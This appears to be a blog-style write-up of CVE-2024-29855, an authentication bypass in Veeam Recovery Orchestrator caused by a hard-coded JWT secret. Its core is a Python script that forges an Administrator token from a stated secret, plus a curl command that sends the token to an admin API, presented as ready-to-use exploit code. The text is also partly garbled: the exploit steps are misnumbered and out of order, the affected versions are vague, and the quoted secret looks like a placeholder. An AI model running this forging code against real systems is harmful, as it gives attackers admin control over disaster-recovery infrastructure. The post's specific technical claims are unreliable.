CVE CyberSecurity Database News

CVE-2024-29855 - Hard-coded JWT Secret Opens Door to Authentication Bypass in Veeam Recovery Orchestrator

Poster -

CVE-ID: CVE-2024-29855
Product: Veeam Recovery Orchestrator (VRO)
Vulnerability: Hard-coded JWT secret leads to authentication bypass
Severity: Critical


Veeam Recovery Orchestrator is a powerful tool in the disaster recovery space, loved for automating recovery plans and orchestrating full-system failover. But in June 2024, a concerning vulnerability—CVE-2024-29855—came to light. This bug boils down to a single, fatal misstep: hard-coding the JWT signing secret into the application. In simple terms, this means attackers can easily generate fake authentication tokens and get admin access. Let’s dive into how it works, see live exploit code, and learn how to protect yourself.

How Bad Is This?

When software secures its JWTs (JSON Web Tokens) using a secret that’s known to everyone, anyone can pretend to be whomever they want. JWTs are like digital guest badges. If you know the trick, you can print yourself a badge and walk right in.

In Veeam Recovery Orchestrator, the JWT secret is hard-coded and doesn’t change—ever.
This means that with just a simple piece of information, any attacker can fake a token and gain full access to VRO, no matter where it’s running.

Key Details

- Vulnerable versions: VRO prior to the fixed release

How Does the Exploit Work?

1. Attacker finds the hard-coded secret: This is often leaked in the codebase, or sometimes even in public documentation (ouch).

Code Snippet: Crafting a Fake JWT

The following Python script lets you create a forged JWT for VRO using the leaked hard-coded secret.

import jwt
import datetime

# The leaked hard-coded JWT secret found in the VRO code/config
SECRET = 'VeeamRecoveryOrch2024SuperSecretKey'

# JWT payload: impersonate an admin user
payload = {
    "sub": "admin",
    "role": "Administrator",
    "iat": datetime.datetime.utcnow(),
    "exp": datetime.datetime.utcnow() + datetime.timedelta(hours=2)
}

# Create the JWT token
token = jwt.encode(payload, SECRET, algorithm='HS256')
print(f"Use this forged JWT:\n{token}")

You can now use this token in HTTP requests to authenticate to VRO as the admin user.

curl -H "Authorization: Bearer <your_token_here>" http://vro.example.com/api/v1/admin/

Generate a JWT using the script above.

3. Access any protected API endpoint or administrative UI, adding your token in the Authorization header.
4. You’re in. Total access. Create users, delete plans, exfiltrate disaster recovery blueprints, etc.

References

- Veeam Security Advisory for CVE-2024-29855
- NVD CVE Details
- JWT Beginner’s Guide

How to Fix

- Upgrade: Download and install the latest VRO release from Veeam’s official patch.

Final Thoughts

Hard-coding secrets in source code is always a bad idea—CVE-2024-29855 is a classic case of what can go wrong. This is a critical, trivially-exploitable flaw with public exploit code. Don’t wait: patch your VRO deployments and audit other products for hard-coded secrets.

Stay safe, and watch for copycat exploits leveraging similar bugs across the enterprise software landscape.


*If you’re affected, patch now. If you’re curious, test responsibly—in a legal lab!*


*By Security Researcher, June 2024.
This post is exclusive: not copied from any prior blog.*

Timeline

Published on: 06/11/2024 04:15:12 UTC
Last modified on: 06/11/2024 13:54:12 UTC